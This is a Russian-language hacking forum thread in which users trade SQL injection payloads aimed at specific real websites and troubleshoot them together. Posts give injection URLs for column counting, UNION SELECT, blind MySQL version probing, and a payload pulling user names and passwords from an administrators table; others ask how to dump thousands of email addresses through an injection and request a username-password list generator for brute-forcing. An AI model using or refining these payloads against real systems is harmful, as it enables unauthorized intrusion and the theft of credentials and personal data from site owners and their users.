 |
|
19.07.2008, 15:31
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Сообщение от 2la.painkiller
Хелп не могу сделать запрос
http://www.autoexotica.ru/news/?nid=128' дыра
http://www.autoexotica.ru/news/?nid=128+order+by+11/* колонок
http://www.autoexotica.ru/news/?nid=128+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Пишет ошибку как так?
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11/*' at line 1
SELECT *, DATE_FORMAT(date, "%d.%m.%y") AS frm_date FROM news_data WHERE news_id=128 union select 1,2,3,4,5,6,7,8,9,10,11/*
Дело в том что на сервере стоит 3 версия MySQL которая не поддерживает в подзапросах union
http://www.autoexotica.ru/news/?nid=128+AND+ascii(lower(substring(version(),1,1)) )=51
|
|
|
19.07.2008, 15:36
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
С нами:
9457966
Репутация:
0
|
|
Ни чего не выводит в таком запросе ( И что такое наконце 51 ?
где можно почитать про взлом 3 версии?
|
|
|
|
19.07.2008, 20:02
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
2 2la.painkiller та не в запросе просто опечатка должно быть
substring(version(),1,1)=3/*
почитать можно на ачате вота линк
http://forum.antichat.ru/showpost.php?p=565034&postcount=4
пора бы уж хотя бы форуму научиться поиск делать  |
|
|
|
20.07.2008, 07:35
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами:
9420866
Репутация:
228
|
|
Сообщение от 2la.painkiller
Нет всё там нормально!
http://bikemaster.ru/popup_image1.php?pID=-1'+union+select+1,unhex(hex(concat_ws(user_name,0x 3a,user_password))),3,4,5+from+0x61646d696e6973747 261746f7273/*
1064 - You have an error in your SQL syntax near 'union select ...
Когда убираешь кавычку перед union, то вообще пустой экран.
|
|
|
|
20.07.2008, 12:17
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Сообщение от MaSTeR GэN
2 2la.painkiller та не в запросе просто опечатка должно быть
substring(version(),1,1)=3/*
почитать можно на ачате вота линк
http://forum.antichat.ru/showpost.php?p=565034&postcount=4
пора бы уж хотя бы форуму научиться поиск делать
какая нахрен опечатка?
ascii там не зря стоит...
http://www.securitylab.ru/contest/212099.php
|
|
|
|
20.07.2008, 12:29
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
С нами:
9591697
Репутация:
96
|
|
есть sql inject, но с лимитом! Есть желание вытащить базу емайлов,но их можно просматривать только по одному, а их > нескольких тысяч,как вытащить?
|
|
|
|
20.07.2008, 12:38
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
юзай сипт http://forum.antichat.ru/thread24918.html
|
|
|
|
20.07.2008, 16:22
|
|
Постоянный
Регистрация: 05.12.2003
Сообщений: 340
С нами:
11805446
Репутация:
98
|
|
Ребят, подскажите пли3 универсальный, хороший генератор паролей.
Для создания листов user;password
самое главное чтобы там была возможность-
1. создание листа, где пароль повторяет имя юзера... ( т.е. берет из файла логины и приписывает, повторяет, логин в пароль...
Спасибо
|
|
|
|
20.07.2008, 18:16
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от _Pantera_
какая нахрен опечатка?
ascii там не зря стоит...
http://www.securitylab.ru/contest/212099.php
А помоему зря - версия БД начинается, всё равно, с цифр (другого я не видел, по крайней мере если БД - мускул), поэтому что бы узнать первую цифру версии использовать ascii() не обязательно.
А вот для вывода не цифровых данных использовать ascii() в общем случае нужно.
|
|
|
|
21.07.2008, 00:23
|
|
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
С нами:
10628635
Репутация:
78
|
|
Никак не получается раскрутить инъекцию
http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=rank&sort_direc tion=1'
как только пытаюсь раскрутить пишет
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
